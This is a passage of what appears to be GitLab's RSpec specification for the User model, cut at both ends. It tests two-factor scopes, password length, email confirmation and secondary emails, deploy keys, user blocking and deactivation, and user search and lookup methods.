expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
it "excludes users with 2fa enabled via U2F" do
user_with_2fa = create(:user, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
it "excludes users with 2fa enabled via OTP and U2F" do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
expect(users_without_two_factor).not_to include(user_with_2fa.id)
end
end
describe '.random_password' do
let(:random_password) { described_class.random_password }
before do
expect(User).to receive(:password_length).and_return(88..128)
end
context 'length' do
it 'conforms to the current password length settings' do
expect(random_password.length).to eq(128)
end
end
end
describe '.password_length' do
let(:password_length) { described_class.password_length }
it 'is expected to be a Range' do
expect(password_length).to be_a(Range)
end
context 'minimum value' do
before do
stub_application_setting(minimum_password_length: 101)
end
it 'is determined by the current value of `minimum_password_length` attribute of application_setting' do
expect(password_length.min).to eq(101)
end
end
context 'maximum value' do
before do
allow(Devise.password_length).to receive(:max).and_return(201)
end
it 'is determined by the current value of `Devise.password_length.max`' do
expect(password_length.max).to eq(201)
end
end
end
describe '.limit_to_todo_authors' do
context 'when filtering by todo authors' do
let(:user1) { create(:user) }
let(:user2) { create(:user) }
before do
create(:todo, user: user1, author: user1, state: :done)
create(:todo, user: user2, author: user2, state: :pending)
end
it 'only returns users that have authored todos' do
users = described_class.limit_to_todo_authors(
user: user2,
with_todos: true,
todo_state: :pending
)
expect(users).to eq([user2])
end
it 'ignores users that do not have a todo in the matching state' do
users = described_class.limit_to_todo_authors(
user: user1,
with_todos: true,
todo_state: :pending
)
expect(users).to be_empty
end
end
context 'when not filtering by todo authors' do
it 'returns the input relation' do
user1 = create(:user)
user2 = create(:user)
rel = described_class.limit_to_todo_authors(user: user1)
expect(rel).to include(user1, user2)
end
end
context 'when no user is provided' do
it 'returns the input relation' do
user1 = create(:user)
user2 = create(:user)
rel = described_class.limit_to_todo_authors
expect(rel).to include(user1, user2)
end
end
end
describe '.by_username' do
it 'finds users regardless of the case passed' do
user = create(:user, username: 'CaMeLcAsEd')
user2 = create(:user, username: 'UPPERCASE')
expect(described_class.by_username(%w(CAMELCASED uppercase)))
.to contain_exactly(user, user2)
end
it 'finds a single user regardless of the case passed' do
user = create(:user, username: 'CaMeLcAsEd')
expect(described_class.by_username('CAMELCASED'))
.to contain_exactly(user)
end
end
describe '.with_expiring_and_not_notified_personal_access_tokens' do
let_it_be(:user1) { create(:user) }
let_it_be(:user2) { create(:user) }
let_it_be(:user3) { create(:user) }
let_it_be(:expired_token) { create(:personal_access_token, user: user1, expires_at: 2.days.ago) }
let_it_be(:revoked_token) { create(:personal_access_token, user: user1, revoked: true) }
let_it_be(:valid_token_and_notified) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now, expire_notification_delivered: true) }
let_it_be(:valid_token1) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now) }
let_it_be(:valid_token2) { create(:personal_access_token, user: user2, expires_at: 2.days.from_now) }
let(:users) { described_class.with_expiring_and_not_notified_personal_access_tokens(from) }
context 'in one day' do
let(:from) { 1.day.from_now }
it "doesn't include an user" do
expect(users).to be_empty
end
end
context 'in three days' do
let(:from) { 3.days.from_now }
it 'only includes user2' do
expect(users).to contain_exactly(user2)
end
end
end
describe '.active_without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
let_it_be(:user4) { create(:user) }
it 'returns all active users but ghost users' do
expect(described_class.active_without_ghosts).to match_array([user1, user4])
end
end
describe '.without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
it 'returns users without ghosts users' do
expect(described_class.without_ghosts).to match_array([user1, user2])
end
end
end
describe "Respond to" do
it { is_expected.to respond_to(:admin?) }
it { is_expected.to respond_to(:name) }
it { is_expected.to respond_to(:external?) }
end
describe 'before save hook' do
describe '#default_private_profile_to_false' do
let(:user) { create(:user, private_profile: true) }
it 'converts nil to false' do
user.private_profile = nil
user.save!
expect(user.private_profile).to eq false
end
end
context 'when saving an external user' do
let(:user) { create(:user) }
let(:external_user) { create(:user, external: true) }
it "sets other properties aswell" do
expect(external_user.can_create_team).to be_falsey
expect(external_user.can_create_group).to be_falsey
expect(external_user.projects_limit).to be 0
end
end
describe '#check_for_verified_email' do
let(:user) { create(:user) }
let(:secondary) { create(:email, :confirmed, email: '[email protected]', user: user) }
it 'allows a verfied secondary email to be used as the primary without needing reconfirmation' do
user.update!(email: secondary.email)
user.reload
expect(user.email).to eq secondary.email
expect(user.unconfirmed_email).to eq nil
expect(user.confirmed?).to be_truthy
end
end
end
describe 'after commit hook' do
describe '#update_emails_with_primary_email' do
before do
@user = create(:user, email: '[email protected]').tap do |user|
user.skip_reconfirmation!
end
@secondary = create :email, email: '[email protected]', user: @user
@user.reload
end
it 'gets called when email updated' do
expect(@user).to receive(:update_emails_with_primary_email)
@user.update!(email: '[email protected]')
end
it 'adds old primary to secondary emails when secondary is a new email ' do
@user.update!(email: '[email protected]')
@user.reload
expect(@user.emails.count).to eq 2
expect(@user.emails.pluck(:email)).to match_array([@secondary.email, '[email protected]'])
end
it 'adds old primary to secondary emails if secondary is becoming a primary' do
@user.update!(email: @secondary.email)
@user.reload
expect(@user.emails.count).to eq 1
expect(@user.emails.first.email).to eq '[email protected]'
end
it 'transfers old confirmation values into new secondary' do
@user.update!(email: @secondary.email)
@user.reload
expect(@user.emails.count).to eq 1
expect(@user.emails.first.confirmed_at).not_to eq nil
end
context 'when the first email was unconfirmed and the second email gets confirmed' do
let(:user) { create(:user, :unconfirmed, email: '[email protected]') }
before do
user.update!(email: '[email protected]')
user.confirm
end
it 'updates user.email' do
expect(user.email).to eq('[email protected]')
end
it 'confirms user.email' do
expect(user).to be_confirmed
end
it 'keeps the unconfirmed email unconfirmed' do
email = user.emails.first
expect(email.email).to eq('[email protected]')
expect(email).not_to be_confirmed
end
it 'has only one email association' do
expect(user.emails.size).to be(1)
end
end
end
context 'when an existing email record is set as primary' do
let(:user) { create(:user, email: '[email protected]') }
context 'when it is unconfirmed' do
let(:originally_unconfirmed_email) { '[email protected]' }
before do
user.emails << create(:email, email: originally_unconfirmed_email, confirmed_at: nil)
user.update!(email: originally_unconfirmed_email)
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'keeps the original email' do
expect(user.email).to eq('[email protected]')
end
context 'when the email gets confirmed' do
before do
user.confirm
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'updates the email' do
expect(user.email).to eq(originally_unconfirmed_email)
end
end
end
context 'when it is confirmed' do
let!(:old_confirmed_email) { user.email }
let(:confirmed_email) { '[email protected]' }
before do
user.emails << create(:email, :confirmed, email: confirmed_email)
user.update!(email: confirmed_email)
end
it 'keeps the user confirmed' do
expect(user).to be_confirmed
end
it 'updates the email' do
expect(user.email).to eq(confirmed_email)
end
it 'moves the old email' do
email = user.reload.emails.first
expect(email.email).to eq(old_confirmed_email)
expect(email).to be_confirmed
end
end
end
context 'when unconfirmed user deletes a confirmed additional email' do
let(:user) { create(:user, :unconfirmed) }
before do
user.emails << create(:email, :confirmed)
end
it 'does not affect the confirmed status' do
expect { user.emails.confirmed.destroy_all }.not_to change { user.confirmed? } # rubocop: disable Cop/DestroyAll
end
end
describe '#update_notification_email' do
# Regression: https://gitlab.com/gitlab-org/gitlab-foss/issues/22846
context 'when changing :email' do
let(:user) { create(:user) }
let(:new_email) { '[email protected]' }
it 'sets :unconfirmed_email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.to change(user, :unconfirmed_email).to(new_email)
end
it 'does not change :notification_email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.not_to change(user, :notification_email)
end
it 'updates :notification_email to the new email once confirmed' do
user.update!(email: new_email)
expect do
user.tap(&:confirm).reload
end.to change(user, :notification_email).to eq(new_email)
end
context 'and :notification_email is set to a secondary email' do
let!(:email_attrs) { attributes_for(:email, :confirmed, user: user) }
let(:secondary) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
user.emails.create(email_attrs)
user.tap { |u| u.update!(notification_email: email_attrs[:email]) }.reload
end
it 'does not change :notification_email to :email' do
expect do
user.tap { |u| u.update!(email: new_email) }.reload
end.not_to change(user, :notification_email)
end
it 'does not change :notification_email to :email once confirmed' do
user.update!(email: new_email)
expect do
user.tap(&:confirm).reload
end.not_to change(user, :notification_email)
end
end
end
end
describe '#update_invalid_gpg_signatures' do
let(:user) do
create(:user, email: '[email protected]').tap do |user|
user.skip_reconfirmation!
end
end
it 'does nothing when the name is updated' do
expect(user).not_to receive(:update_invalid_gpg_signatures)
user.update!(name: 'Bette')
end
it 'synchronizes the gpg keys when the email is updated' do
expect(user).to receive(:update_invalid_gpg_signatures).at_most(:twice)
user.update!(email: '[email protected]')
end
end
end
describe 'name getters' do
let(:user) { create(:user, name: 'Kane Martin William') }
it 'derives first name from full name, if not present' do
expect(user.first_name).to eq('Kane')
end
it 'derives last name from full name, if not present' do
expect(user.last_name).to eq('Martin William')
end
end
describe '#highest_role' do
let_it_be(:user) { create(:user) }
context 'when user_highest_role does not exist' do
it 'returns NO_ACCESS' do
expect(user.highest_role).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'when user_highest_role exists' do
context 'stored highest access level is nil' do
it 'returns Gitlab::Access::NO_ACCESS' do
create(:user_highest_role, user: user)
expect(user.highest_role).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'stored highest access level present' do
context 'with association :user_highest_role' do
let(:another_user) { create(:user) }
before do
create(:user_highest_role, :maintainer, user: user)
create(:user_highest_role, :developer, user: another_user)
end
it 'returns the correct highest role' do
users = User.includes(:user_highest_role).where(id: [user.id, another_user.id])
expect(users.collect { |u| [u.id, u.highest_role] }).to contain_exactly(
[user.id, Gitlab::Access::MAINTAINER],
[another_user.id, Gitlab::Access::DEVELOPER]
)
end
end
end
end
end
describe '#update_tracked_fields!', :clean_gitlab_redis_shared_state do
let(:request) { OpenStruct.new(remote_ip: "127.0.0.1") }
let(:user) { create(:user) }
it 'writes trackable attributes' do
expect do
user.update_tracked_fields!(request)
end.to change { user.reload.current_sign_in_at }
end
it 'does not write trackable attributes when called a second time within the hour' do
user.update_tracked_fields!(request)
expect do
user.update_tracked_fields!(request)
end.not_to change { user.reload.current_sign_in_at }
end
it 'writes trackable attributes for a different user' do
user2 = create(:user)
user.update_tracked_fields!(request)
expect do
user2.update_tracked_fields!(request)
end.to change { user2.reload.current_sign_in_at }
end
it 'does not write if the DB is in read-only mode' do
expect(Gitlab::Database).to receive(:read_only?).and_return(true)
expect do
user.update_tracked_fields!(request)
end.not_to change { user.reload.current_sign_in_at }
end
end
shared_context 'user keys' do
let(:user) { create(:user) }
let!(:key) { create(:key, user: user) }
let!(:deploy_key) { create(:deploy_key, user: user) }
end
describe '#keys' do
include_context 'user keys'
context 'with key and deploy key stored' do
it 'returns stored key, but not deploy_key' do
expect(user.keys).to include key
expect(user.keys).not_to include deploy_key
end
end
end
describe '#accessible_deploy_keys' do
let(:user) { create(:user) }
let(:project) { create(:project) }
let!(:private_deploy_keys_project) { create(:deploy_keys_project) }
let!(:public_deploy_keys_project) { create(:deploy_keys_project) }
let!(:accessible_deploy_keys_project) { create(:deploy_keys_project, project: project) }
before do
public_deploy_keys_project.deploy_key.update(public: true)
project.add_developer(user)
end
it 'user can only see deploy keys accessible to right projects' do
expect(user.accessible_deploy_keys).to match_array([public_deploy_keys_project.deploy_key,
accessible_deploy_keys_project.deploy_key])
end
end
describe '#deploy_keys' do
include_context 'user keys'
context 'with key and deploy key stored' do
it 'returns stored deploy key, but not normal key' do
expect(user.deploy_keys).to include deploy_key
expect(user.deploy_keys).not_to include key
end
end
end
describe '#confirm' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:send_user_confirmation_email).and_return(true)
end
let(:user) { create(:user, confirmed_at: nil, unconfirmed_email: '[email protected]') }
it 'returns unconfirmed' do
expect(user.confirmed?).to be_falsey
end
it 'confirms a user' do
user.confirm
expect(user.confirmed?).to be_truthy
end
end
describe '#to_reference' do
let(:user) { create(:user) }
it 'returns a String reference to the object' do
expect(user.to_reference).to eq "@#{user.username}"
end
end
describe '#generate_password' do
it "does not generate password by default" do
user = create(:user, password: 'abcdefghe')
expect(user.password).to eq('abcdefghe')
end
end
describe 'ensure user preference' do
it 'has user preference upon user initialization' do
user = build(:user)
expect(user.user_preference).to be_present
expect(user.user_preference).not_to be_persisted
end
end
describe 'ensure incoming email token' do
it 'has incoming email token' do
user = create(:user)
expect(user.incoming_email_token).not_to be_blank
end
it 'uses SecureRandom to generate the incoming email token' do
allow_next_instance_of(User) do |user|
allow(user).to receive(:update_highest_role)
end
expect(SecureRandom).to receive(:hex).and_return('3b8ca303')
user = create(:user)
expect(user.incoming_email_token).to eql('gitlab')
end
end
describe '#ensure_user_rights_and_limits' do
describe 'with external user' do
let(:user) { create(:user, external: true) }
it 'receives callback when external changes' do
expect(user).to receive(:ensure_user_rights_and_limits)
user.update(external: false)
end
it 'ensures correct rights and limits for user' do
stub_config_setting(default_can_create_group: true)
expect { user.update(external: false) }.to change { user.can_create_group }.to(true)
.and change { user.projects_limit }.to(Gitlab::CurrentSettings.default_projects_limit)
end
end
describe 'without external user' do
let(:user) { create(:user, external: false) }
it 'receives callback when external changes' do
expect(user).to receive(:ensure_user_rights_and_limits)
user.update(external: true)
end
it 'ensures correct rights and limits for user' do
expect { user.update(external: true) }.to change { user.can_create_group }.to(false)
.and change { user.projects_limit }.to(0)
end
end
end
describe 'feed token' do
it 'ensures a feed token on read' do
user = create(:user, feed_token: nil)
feed_token = user.feed_token
expect(feed_token).not_to be_blank
expect(user.reload.feed_token).to eq feed_token
end
end
describe 'static object token' do
it 'ensures a static object token on read' do
user = create(:user, static_object_token: nil)
static_object_token = user.static_object_token
expect(static_object_token).not_to be_blank
expect(user.reload.static_object_token).to eq static_object_token
end
end
describe '#recently_sent_password_reset?' do
it 'is false when reset_password_sent_at is nil' do
user = build_stubbed(:user, reset_password_sent_at: nil)
expect(user.recently_sent_password_reset?).to eq false
end
it 'is false when sent more than one minute ago' do
user = build_stubbed(:user, reset_password_sent_at: 5.minutes.ago)
expect(user.recently_sent_password_reset?).to eq false
end
it 'is true when sent less than one minute ago' do
user = build_stubbed(:user, reset_password_sent_at: Time.now)
expect(user.recently_sent_password_reset?).to eq true
end
end
describe '#disable_two_factor!' do
it 'clears all 2FA-related fields' do
user = create(:user, :two_factor)
expect(user).to be_two_factor_enabled
expect(user.encrypted_otp_secret).not_to be_nil
expect(user.otp_backup_codes).not_to be_nil
expect(user.otp_grace_period_started_at).not_to be_nil
user.disable_two_factor!
expect(user).not_to be_two_factor_enabled
expect(user.encrypted_otp_secret).to be_nil
expect(user.encrypted_otp_secret_iv).to be_nil
expect(user.encrypted_otp_secret_salt).to be_nil
expect(user.otp_backup_codes).to be_nil
expect(user.otp_grace_period_started_at).to be_nil
end
end
describe 'projects' do
before do
@user = create(:user)
@project = create(:project, namespace: @user.namespace)
@project_2 = create(:project, group: create(:group)) do |project|
project.add_maintainer(@user)
end
@project_3 = create(:project, group: create(:group)) do |project|
project.add_developer(@user)
end
end
it { expect(@user.authorized_projects).to include(@project) }
it { expect(@user.authorized_projects).to include(@project_2) }
it { expect(@user.authorized_projects).to include(@project_3) }
it { expect(@user.owned_projects).to include(@project) }
it { expect(@user.owned_projects).not_to include(@project_2) }
it { expect(@user.owned_projects).not_to include(@project_3) }
it { expect(@user.personal_projects).to include(@project) }
it { expect(@user.personal_projects).not_to include(@project_2) }
it { expect(@user.personal_projects).not_to include(@project_3) }
end
describe 'groups' do
let(:user) { create(:user) }
let(:group) { create(:group) }
before do
group.add_owner(user)
end
it { expect(user.several_namespaces?).to be_truthy }
it { expect(user.authorized_groups).to eq([group]) }
it { expect(user.owned_groups).to eq([group]) }
it { expect(user.namespaces).to contain_exactly(user.namespace, group) }
it { expect(user.manageable_namespaces).to contain_exactly(user.namespace, group) }
context 'with child groups' do
let!(:subgroup) { create(:group, parent: group) }
describe '#manageable_namespaces' do
it 'includes all the namespaces the user can manage' do
expect(user.manageable_namespaces).to contain_exactly(user.namespace, group, subgroup)
end
end
describe '#manageable_groups' do
it 'includes all the namespaces the user can manage' do
expect(user.manageable_groups).to contain_exactly(group, subgroup)
end
it 'does not include duplicates if a membership was added for the subgroup' do
subgroup.add_owner(user)
expect(user.manageable_groups).to contain_exactly(group, subgroup)
end
end
describe '#manageable_groups_with_routes' do
it 'eager loads routes from manageable groups' do
control_count =
ActiveRecord::QueryRecorder.new(skip_cached: false) do
user.manageable_groups_with_routes.map(&:route)
end.count
create(:group, parent: subgroup)
expect do
user.manageable_groups_with_routes.map(&:route)
end.not_to exceed_all_query_limit(control_count)
end
end
end
end
describe 'group multiple owners' do
before do
@user = create :user
@user2 = create :user
@group = create :group
@group.add_owner(@user)
@group.add_user(@user2, GroupMember::OWNER)
end
it { expect(@user2.several_namespaces?).to be_truthy }
end
describe 'namespaced' do
before do
@user = create :user
@project = create(:project, namespace: @user.namespace)
end
it { expect(@user.several_namespaces?).to be_falsey }
it { expect(@user.namespaces).to eq([@user.namespace]) }
end
describe 'blocking user' do
let(:user) { create(:user, name: 'John Smith') }
it 'blocks user' do
user.block
expect(user.blocked?).to be_truthy
end
context 'when user has running CI pipelines' do
let(:service) { double }
before do
pipeline = create(:ci_pipeline, :running, user: user)
create(:ci_build, :running, pipeline: pipeline)
end
it 'cancels all running pipelines and related jobs' do
expect(Ci::CancelUserPipelinesService).to receive(:new).and_return(service)
expect(service).to receive(:execute).with(user)
user.block
end
end
end
describe 'deactivating a user' do
let(:user) { create(:user, name: 'John Smith') }
context "an active user" do
it "can be deactivated" do
user.deactivate
expect(user.deactivated?).to be_truthy
end
end
context "a user who is blocked" do
before do
user.block
end
it "cannot be deactivated" do
user.deactivate
expect(user.reload.deactivated?).to be_falsy
end
end
end
describe '.filter_items' do
let(:user) { double }
it 'filters by active users by default' do
expect(described_class).to receive(:active_without_ghosts).and_return([user])
expect(described_class.filter_items(nil)).to include user
end
it 'filters by admins' do
expect(described_class).to receive(:admins).and_return([user])
expect(described_class.filter_items('admins')).to include user
end
it 'filters by blocked' do
expect(described_class).to receive(:blocked).and_return([user])
expect(described_class.filter_items('blocked')).to include user
end
it 'filters by deactivated' do
expect(described_class).to receive(:deactivated).and_return([user])
expect(described_class.filter_items('deactivated')).to include user
end
it 'filters by two_factor_disabled' do
expect(described_class).to receive(:without_two_factor).and_return([user])
expect(described_class.filter_items('two_factor_disabled')).to include user
end
it 'filters by two_factor_enabled' do
expect(described_class).to receive(:with_two_factor).and_return([user])
expect(described_class.filter_items('two_factor_enabled')).to include user
end
it 'filters by wop' do
expect(described_class).to receive(:without_projects).and_return([user])
expect(described_class.filter_items('wop')).to include user
end
end
describe '.without_projects' do
let!(:project) { create(:project, :public) }
let!(:user) { create(:user) }
let!(:user_without_project) { create(:user) }
let!(:user_without_project2) { create(:user) }
before do
# add user to project
project.add_maintainer(user)
# create invite to projet
create(:project_member, :developer, project: project, invite_token: '1234', invite_email: '[email protected]')
# create request to join project
project.request_access(user_without_project2)
end
it { expect(described_class.without_projects).not_to include user }
it { expect(described_class.without_projects).to include user_without_project }
it { expect(described_class.without_projects).to include user_without_project2 }
end
describe 'user creation' do
describe 'normal user' do
let(:user) { create(:user, name: 'John Smith') }
it { expect(user.admin?).to be_falsey }
it { expect(user.require_ssh_key?).to be_truthy }
it { expect(user.can_create_group?).to be_truthy }
it { expect(user.can_create_project?).to be_truthy }
it { expect(user.first_name).to eq('John') }
it { expect(user.external).to be_falsey }
end
describe 'with defaults' do
let(:user) { described_class.new }
it "applies defaults to user" do
expect(user.projects_limit).to eq(Gitlab.config.gitlab.default_projects_limit)
expect(user.can_create_group).to eq(Gitlab.config.gitlab.default_can_create_group)
expect(user.theme_id).to eq(Gitlab.config.gitlab.default_theme)
expect(user.external).to be_falsey
expect(user.private_profile).to eq(false)
end
end
describe 'with default overrides' do
let(:user) { described_class.new(projects_limit: 123, can_create_group: false, can_create_team: true) }
it "applies defaults to user" do
expect(user.projects_limit).to eq(123)
expect(user.can_create_group).to be_falsey
expect(user.theme_id).to eq(1)
end
it 'does not undo projects_limit setting if it matches old DB default of 10' do
# If the real default project limit is 10 then this test is worthless
expect(Gitlab.config.gitlab.default_projects_limit).not_to eq(10)
user = described_class.new(projects_limit: 10)
expect(user.projects_limit).to eq(10)
end
end
context 'when Gitlab::CurrentSettings.user_default_external is true' do
before do
stub_application_setting(user_default_external: true)
end
it "creates external user by default" do
user = create(:user)
expect(user.external).to be_truthy
expect(user.can_create_group).to be_falsey
expect(user.projects_limit).to be 0
end
describe 'with default overrides' do
it "creates a non-external user" do
user = create(:user, external: false)
expect(user.external).to be_falsey
end
end
end
describe '#require_ssh_key?', :use_clean_rails_memory_store_caching do
protocol_and_expectation = {
'http' => false,
'ssh' => true,
'' => true
}
protocol_and_expectation.each do |protocol, expected|
it "has correct require_ssh_key?" do
stub_application_setting(enabled_git_access_protocol: protocol)
user = build(:user)
expect(user.require_ssh_key?).to eq(expected)
end
end
it 'returns false when the user has 1 or more SSH keys' do
key = create(:personal_key)
expect(key.user.require_ssh_key?).to eq(false)
end
end
end
describe '.find_for_database_authentication' do
it 'strips whitespace from login' do
user = create(:user)
expect(described_class.find_for_database_authentication({ login: " #{user.username} " })).to eq user
end
end
describe '.find_by_any_email' do
it 'finds user through private commit email' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.find_by_any_email(private_email)).to eq(user)
expect(described_class.find_by_any_email(private_email, confirmed: true)).to eq(user)
end
it 'finds by primary email' do
user = create(:user, email: '[email protected]')
expect(described_class.find_by_any_email(user.email)).to eq user
expect(described_class.find_by_any_email(user.email, confirmed: true)).to eq user
end
it 'finds by uppercased email' do
user = create(:user, email: '[email protected]')
expect(described_class.find_by_any_email(user.email.upcase)).to eq user
expect(described_class.find_by_any_email(user.email.upcase, confirmed: true)).to eq user
end
context 'finds by secondary email' do
let(:user) { email.user }
context 'primary email confirmed' do
context 'secondary email confirmed' do
let!(:email) { create(:email, :confirmed, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to eq user
end
end
context 'secondary email not confirmed' do
let!(:email) { create(:email, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to be_nil
end
end
end
context 'primary email not confirmed' do
let(:user) { create(:user, confirmed_at: nil) }
let!(:email) { create(:email, :confirmed, user: user, email: '[email protected]') }
it 'finds user respecting the confirmed flag' do
expect(described_class.find_by_any_email(email.email)).to eq user
expect(described_class.find_by_any_email(email.email, confirmed: true)).to be_nil
end
end
end
it 'returns nil when nothing found' do
expect(described_class.find_by_any_email('')).to be_nil
end
it 'returns nil when user is not confirmed' do
user = create(:user, email: '[email protected]', confirmed_at: nil)
expect(described_class.find_by_any_email(user.email, confirmed: false)).to eq(user)
expect(described_class.find_by_any_email(user.email, confirmed: true)).to be_nil
end
end
describe '.by_any_email' do
it 'returns an ActiveRecord::Relation' do
expect(described_class.by_any_email('[email protected]'))
.to be_a_kind_of(ActiveRecord::Relation)
end
it 'returns a relation of users' do
user = create(:user)
expect(described_class.by_any_email(user.email)).to eq([user])
end
it 'returns a relation of users for confirmed users' do
user = create(:user)
expect(described_class.by_any_email(user.email, confirmed: true)).to eq([user])
end
it 'finds user through a private commit email' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.by_any_email(private_email)).to eq([user])
expect(described_class.by_any_email(private_email, confirmed: true)).to eq([user])
end
it 'finds user through a private commit email in an array' do
user = create(:user)
private_email = user.private_commit_email
expect(described_class.by_any_email([private_email])).to eq([user])
expect(described_class.by_any_email([private_email], confirmed: true)).to eq([user])
end
end
describe '.search' do
let!(:user) { create(:user, name: 'user', username: 'usern', email: '[email protected]') }
let!(:user2) { create(:user, name: 'user name', username: 'username', email: '[email protected]') }
let!(:user3) { create(:user, name: 'us', username: 'se', email: '[email protected]') }
describe 'name matching' do
it 'returns users with a matching name with exact match first' do
expect(described_class.search(user.name)).to eq([user, user2])
end
it 'returns users with a partially matching name' do
expect(described_class.search(user.name[0..2])).to eq([user, user2])
end
it 'returns users with a matching name regardless of the casing' do
expect(described_class.search(user2.name.upcase)).to eq([user2])
end
it 'returns users with a exact matching name shorter than 3 chars' do
expect(described_class.search(user3.name)).to eq([user3])
end
it 'returns users with a exact matching name shorter than 3 chars regardless of the casing' do
expect(described_class.search(user3.name.upcase)).to eq([user3])
end
end
describe 'email matching' do
it 'returns users with a matching Email' do
expect(described_class.search(user.email)).to eq([user])
end
it 'does not return users with a partially matching Email' do
expect(described_class.search(user.email[0..2])).not_to include(user, user2)
end
it 'returns users with a matching Email regardless of the casing' do
expect(described_class.search(user2.email.upcase)).to eq([user2])
end
end
describe 'username matching' do
it 'returns users with a matching username' do
expect(described_class.search(user.username)).to eq([user, user2])
end
it 'returns users with a matching username starting with a @' do
expect(described_class.search("@#{user.username}")).to eq([user, user2])
end
it 'returns users with a partially matching username' do
expect(described_class.search(user.username[0..2])).to eq([user, user2])
end
it 'returns users with a partially matching username starting with @' do
expect(described_class.search("@#{user.username[0..2]}")).to eq([user, user2])
end
it 'returns users with a matching username regardless of the casing' do
expect(described_class.search(user2.username.upcase)).to eq([user2])
end
it 'returns users with a exact matching username shorter than 3 chars' do
expect(described_class.search(user3.username)).to eq([user3])
end
it 'returns users with a exact matching username shorter than 3 chars regardless of the casing' do
expect(described_class.search(user3.username.upcase)).to eq([user3])
end
end
it 'returns no matches for an empty string' do
expect(described_class.search('')).to be_empty
end
it 'returns no matches for nil' do
expect(described_class.search(nil)).to be_empty
end
end
describe '.search_with_secondary_emails' do
delegate :search_with_secondary_emails, to: :described_class
let!(:user) { create(:user, name: 'John Doe', username: 'john.doe', email: '[email protected]' ) }
let!(:another_user) { create(:user, name: 'Albert Smith', username: 'albert.smith', email: '[email protected]' ) }
let!(:email) do
create(:email, user: another_user, email: '[email protected]')
end
it 'returns users with a matching name' do
expect(search_with_secondary_emails(user.name)).to eq([user])
end
it 'returns users with a partially matching name' do
expect(search_with_secondary_emails(user.name[0..2])).to eq([user])
end
it 'returns users with a matching name regardless of the casing' do
expect(search_with_secondary_emails(user.name.upcase)).to eq([user])
end
it 'returns users with a matching email' do
expect(search_with_secondary_emails(user.email)).to eq([user])
end
it 'does not return users with a partially matching email' do
expect(search_with_secondary_emails(user.email[0..2])).not_to include([user])
end
it 'returns users with a matching email regardless of the casing' do
expect(search_with_secondary_emails(user.email.upcase)).to eq([user])
end
it 'returns users with a matching username' do
expect(search_with_secondary_emails(user.username)).to eq([user])
end
it 'returns users with a partially matching username' do
expect(search_with_secondary_emails(user.username[0..2])).to eq([user])
end
it 'returns users with a matching username regardless of the casing' do
expect(search_with_secondary_emails(user.username.upcase)).to eq([user])
end
it 'returns users with a matching whole secondary email' do
expect(search_with_secondary_emails(email.email)).to eq([email.user])
end
it 'does not return users with a matching part of secondary email' do
expect(search_with_secondary_emails(email.email[1..4])).not_to include([email.user])
end
it 'returns no matches for an empty string' do
expect(search_with_secondary_emails('')).to be_empty
end
it 'returns no matches for nil' do
expect(search_with_secondary_emails(nil)).to be_empty
end
end
describe '.find_by_ssh_key_id' do
let_it_be(:user) { create(:user) }
let_it_be(:key) { create(:key, user: user) }
context 'using an existing SSH key ID' do
it 'returns the corresponding User' do
expect(described_class.find_by_ssh_key_id(key.id)).to eq(user)
end
end
it 'only performs a single query' do
key # Don't count the queries for creating the key and user
expect { described_class.find_by_ssh_key_id(key.id) }
.not_to exceed_query_limit(1)
end
context 'using an invalid SSH key ID' do
it 'returns nil' do
expect(described_class.find_by_ssh_key_id(-1)).to be_nil
end
end
end
describe '.by_login' do
let(:username) { 'John' }
let!(:user) { create(:user, username: username) }
it 'gets the correct user' do
expect(described_class.by_login(user.email.upcase)).to eq user
expect(described_class.by_login(user.email)).to eq user
expect(described_class.by_login(username.downcase)).to eq user
expect(described_class.by_login(username)).to eq user
expect(described_class.by_login(nil)).to be_nil
expect(described_class.by_login('')).to be_nil
end
end
describe '.find_by_username' do
it 'returns nil if not found' do
expect(described_class.find_by_username('JohnDoe')).to be_nil
end
it 'is case-insensitive' do
user = create(:user, username: 'JohnDoe')
expect(described_class.find_by_username('JOHNDOE')).to eq user
end
end
describe '.find_by_username!' do
it 'raises RecordNotFound' do
expect { described_class.find_by_username!('JohnDoe') }
.to raise_error(ActiveRecord::RecordNotFound)
end
it 'is case-insensitive' do
user = create(:user, username: 'JohnDoe')
expect(described_class.find_by_username!('JOHNDOE')).to eq user
end
end
describe '.find_by_full_path' do
let!(:user) { create(:user) }
context 'with a route matching the given path' do
let!(:route) { user.namespace.route }
it 'returns the user' do
expect(described_class.find_by_full_path(route.path)).to eq(user)
end
it 'is case-insensitive' do
expect(described_class.find_by_full_path(route.path.upcase)).to eq(user)
expect(described_class.find_by_full_path(route.path.downcase)).to eq(user)
end
end
context 'with a redirect route matching the given path' do
let!(:redirect_route) { user.namespace.redirect_routes.create(path: 'foo') }
context 'without the follow_redirects option' do
it 'returns nil' do
expect(described_class.find_by_full_path(redirect_route.path)).to eq(nil)
end
end
context 'with the follow_redirects option set to true' do
it 'returns the user' do
